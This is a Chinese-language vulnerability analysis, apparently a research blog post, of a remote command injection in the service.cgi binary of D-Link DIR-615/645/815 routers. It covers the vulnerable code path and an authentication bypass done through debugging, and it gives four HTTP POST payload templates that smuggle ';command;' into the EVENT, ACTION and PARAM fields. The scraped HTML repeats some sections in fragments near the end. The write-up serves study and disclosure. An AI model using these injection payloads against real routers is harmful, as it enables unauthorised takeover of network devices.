D-Link DIR-615\/645\/815 service.cgi远程命令执行漏洞分析<\/h1>

漏洞概述<\/h2>
D-Link DIR-615\/645\/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞位于`service.cgi<\/code>中，由于HTTP POST请求中的数据被直接拼接执行，导致攻击者可以执行任意命令。<\/p>`

漏洞分析<\/h2>
漏洞位置<\/h3>
漏洞存在于\/htdocs\/cgibin<\/code>二进制文件的servicecgi_main<\/code>函数中。<\/p>
关键函数<\/h3>

sub_40A1C0<\/code>: 解析函数，解析传入的参数<\/li>
lxmldbc_system<\/code>: 最终会调用system<\/code>执行命令<\/li>
<\/ul>
漏洞原理<\/h3>

程序接收第一个参数并通过sub_40A1C0<\/code>解析<\/li>
解析后的参数(如EVENT=abc<\/code>中的abc<\/code>)会被拼接在event_%s____dev_null<\/code>中<\/li>
最终形成lxmldbc_system(event %s____dev_null)<\/code>形式的命令执行<\/li>
<\/ol>
利用条件<\/h2>

请求方式<\/strong>: 必须使用POST请求，GET请求会直接报错退出<\/li>
Content-Type<\/strong>: 必须设置为application\/x-www-form-urlencoded<\/code><\/li>
用户认证<\/strong>: 需要绕过sess_ispoweruser<\/code>函数的用户验证<\/li>
<\/ol>
漏洞利用路径<\/h2>
有四种路径可以调用lxmldbc_system<\/code>函数：<\/p>


直接通过EVENT参数<\/strong>:<\/p>

当v5!=NULL<\/code>时直接执行v5<\/code><\/li>
<\/ul>
<\/li>

通过SERVICE和ACTION参数<\/strong>:<\/p>

当v5=NULL<\/code>时进入else分支<\/li>
需要v6<\/code>和v7<\/code>都不为NULL<\/li>
v7<\/code>可以是START<\/code>、RESTART<\/code>或STOP<\/code><\/li>
会将v6<\/code>拼接进命令执行<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现方法<\/h2>
用户态QEMU调试<\/h3>

使用用户级QEMU进行调试<\/li>
设置断点在0x40A3A4<\/code><\/li>
通过gdb设置跳过用户认证步骤<\/li>
<\/ol>
绕过用户认证<\/h3>

修改二进制文件将sess_ispoweruser<\/code>函数nop掉<\/li>
或通过gdb直接设置跳过此步骤<\/li>
<\/ol>
Payload构造<\/h3>
使用';cmd;'<\/code>形式拼接执行命令，例如：<\/p>
EVENT=';ls;'
<\/code><\/pre>
漏洞利用EXP<\/h2>
四种可能的payload形式：<\/p>

直接EVENT参数注入：<\/li>
<\/ol>
POST<\/span> \/service.cgi HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>EVENT=';command;'
<\/span><\/span><\/code><\/pre>
SERVICE+ACTION参数注入：<\/li>
<\/ol>
POST<\/span> \/service.cgi HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>SERVICE=START&ACTION=';command;'
<\/span><\/span><\/code><\/pre>
SERVICE+ACTION+RESTART注入：<\/li>
<\/ol>
POST<\/span> \/service.cgi HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>SERVICE=START&ACTION=RESTART&PARAM=';command;'
<\/span><\/span><\/code><\/pre>
SERVICE+ACTION+STOP注入：<\/li>
<\/ol>
POST<\/span> \/service.cgi HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>SERVICE=START&ACTION=STOP&PARAM=';command;'
<\/span><\/span><\/code><\/pre>漏洞挖掘经验<\/h2>

关注危险函数<\/strong>：如system<\/code>、exec<\/code>等<\/li>
利用IDA功能<\/strong>：

函数流程图分析<\/li>
xref交叉引用分析<\/li>
<\/ul>
<\/li>
调试技巧<\/strong>：

多尝试猜测和调试<\/li>
关注参数解析过程<\/li>
<\/ul>
<\/li>
同类漏洞模式<\/strong>：D-Link多个服务功能函数结构相似<\/li>
<\/ol>
参考链接<\/h2>

DIR-645远程命令执行漏洞<\/a><\/li>
国家信息安全漏洞共享平台<\/a><\/li>
<\/ol>

D-Link DIR-615\/645\/815 service.cgi远程命令执行漏洞分析<\/h1>

漏洞概述<\/h2> D-Link DIR-615\/645\/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞位于service.cgi<\/code>中，由于HTTP POST请求中的数据被直接拼接执行，导致攻击者可以执行任意命令。<\/p>

漏洞位置<\/h3> 漏洞存在于\/htdocs\/cgibin<\/code>二进制文件的servicecgi_main<\/code>函数中。<\/p>

漏洞复现方法<\/h2>

参考链接<\/h2> DIR-645远程命令执行漏洞<\/a><\/li> 国家信息安全漏洞共享平台<\/a><\/li> <\/ol>

漏洞概述<\/h2>
D-Link DIR-615\/645\/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞位于`service.cgi<\/code>中，由于HTTP POST请求中的数据被直接拼接执行，导致攻击者可以执行任意命令。<\/p>`

漏洞位置<\/h3>
漏洞存在于`\/htdocs\/cgibin<\/code>二进制文件的servicecgi_main<\/code>函数中。<\/p>`

参考链接<\/h2>

DIR-645远程命令执行漏洞<\/a><\/li>
国家信息安全漏洞共享平台<\/a><\/li> <\/ol>